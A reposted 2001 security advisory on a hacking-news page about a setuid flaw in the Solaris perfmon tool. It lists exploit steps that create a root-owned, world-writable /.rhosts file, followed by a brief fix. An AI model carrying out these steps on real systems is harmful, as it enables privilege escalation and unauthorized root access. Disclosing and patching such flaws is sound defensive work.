Users login

Create an account »


Users login

Home » Hacking News » SunOS application perfmon vulnerability

SunOS application perfmon vulnerability

by phiber on March 23rd, 2001 System: Solaris 2.X
Parm is a program that displays system information.
Parm is SunOS application. It's not included in Solaris basic package.

There is a vulneribility in perfmon program that you can create any file with root privilege....

$ whoami


$ umask 0000

$ /opt/JSparm/bin/perfmon &

Choose Logging -> Logging File

In Selection part, input the file path you want to create ex:) /.rhosts

following file is created in a second.

-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost


Remove setuid permition, contact your vendor and get a patch.

Posted by KimYongJun [] on a bt mailing list.

Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.


Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »